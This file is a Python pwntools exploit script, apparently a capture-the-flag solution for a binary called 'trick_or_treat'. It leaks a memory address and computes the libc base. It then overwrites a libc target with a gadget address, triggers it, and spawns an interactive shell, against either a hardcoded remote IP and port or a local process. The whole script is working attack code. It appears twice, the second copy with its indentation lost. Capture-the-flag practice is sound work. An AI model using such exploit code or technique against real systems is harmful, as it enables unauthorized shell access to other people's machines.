hama7230/exp.py

## exp.py
#!/usr/bin/env python
from pwn import *

context(terminal=['tmux', 'splitw', '-h'])  # horizontal split window
# context(terminal=['tmux', 'new-window'])  # open new window

# libc = ELF('')
elf = ELF('./trick_or_treat')
context(os='linux', arch=elf.arch)
context(log_level='debug')  # output verbose log

RHOST = "3.112.41.140"
RPORT = 56746
LHOST = "127.0.0.1"
LPORT = 56746

def section_addr(name, elf=elf):
    return elf.get_section_by_name(name).header['sh_addr']

def dbg(ss):
    log.info("%s: 0x%x" % (ss, eval(ss)))

conn = None
opt = sys.argv.pop(1) if len(sys.argv) > 1 else '?'  # pop option
if opt in 'rl':
    conn = remote(*{'r': (RHOST, RPORT), 'l': (LHOST, LPORT)}[opt])
elif opt == 'd':
    gdbscript = """

    continue
    """.format(hex(elf.symbols['main'] if 'main' in elf.symbols.keys() else elf.entrypoint))
    conn = gdb.debug(['./trick_or_treat'], gdbscript=gdbscript)
else:
    conn = process(['./trick_or_treat'])
    # conn = process(['./trick_or_treat'], env={'LD_PRELOAD': ''})
    if opt == 'a': gdb.attach(conn)

# exploit
log.info('Pwning')


a = 0x100000
conn.sendlineafter('Size', str(0x1f1000 + a))
conn.recvuntil('Magic:')
m = int(conn.recvline(), 16)
dbg('m')
libc_base = m + 0x1f1ff0 + a
dbg('libc_base')

target = libc_base + 0x3ed8e8
#target = libc_base + 0x3ebc30

# conn.sendline(hex((target - m)/8)[2:] + ' ' + hex(libc_base + 0x10a38c)[2:])
#conn.sendline(hex((target - m)/8)[2:] + ' ' + hex(libc_base + 0x4f322)[2:])
conn.sendline(hex((target - m)/8)[2:] + ' ' + hex(libc_base + 0x4f440)[2:])

conn.sendline( '2'*0x800 + ' ed')

time.sleep(0.1)
conn.sendline('!sh')
conn.interactive()
	#!/usr/bin/env python
	from pwn import *

	context(terminal=['tmux', 'splitw', '-h']) # horizontal split window
	# context(terminal=['tmux', 'new-window']) # open new window

	# libc = ELF('')
	elf = ELF('./trick_or_treat')
	context(os='linux', arch=elf.arch)
	context(log_level='debug') # output verbose log

	RHOST = "3.112.41.140"
	RPORT = 56746
	LHOST = "127.0.0.1"
	LPORT = 56746

	def section_addr(name, elf=elf):
	return elf.get_section_by_name(name).header['sh_addr']

	def dbg(ss):
	log.info("%s: 0x%x" % (ss, eval(ss)))

	conn = None
	opt = sys.argv.pop(1) if len(sys.argv) > 1 else '?' # pop option
	if opt in 'rl':
	conn = remote(*{'r': (RHOST, RPORT), 'l': (LHOST, LPORT)}[opt])
	elif opt == 'd':
	gdbscript = """

	continue
	""".format(hex(elf.symbols['main'] if 'main' in elf.symbols.keys() else elf.entrypoint))
	conn = gdb.debug(['./trick_or_treat'], gdbscript=gdbscript)
	else:
	conn = process(['./trick_or_treat'])
	# conn = process(['./trick_or_treat'], env={'LD_PRELOAD': ''})
	if opt == 'a': gdb.attach(conn)

	# exploit
	log.info('Pwning')


	a = 0x100000
	conn.sendlineafter('Size', str(0x1f1000 + a))
	conn.recvuntil('Magic:')
	m = int(conn.recvline(), 16)
	dbg('m')
	libc_base = m + 0x1f1ff0 + a
	dbg('libc_base')

	target = libc_base + 0x3ed8e8
	#target = libc_base + 0x3ebc30

	# conn.sendline(hex((target - m)/8)[2:] + ' ' + hex(libc_base + 0x10a38c)[2:])
	#conn.sendline(hex((target - m)/8)[2:] + ' ' + hex(libc_base + 0x4f322)[2:])
	conn.sendline(hex((target - m)/8)[2:] + ' ' + hex(libc_base + 0x4f440)[2:])

	conn.sendline( '2'*0x800 + ' ed')

	time.sleep(0.1)
	conn.sendline('!sh')
	conn.interactive()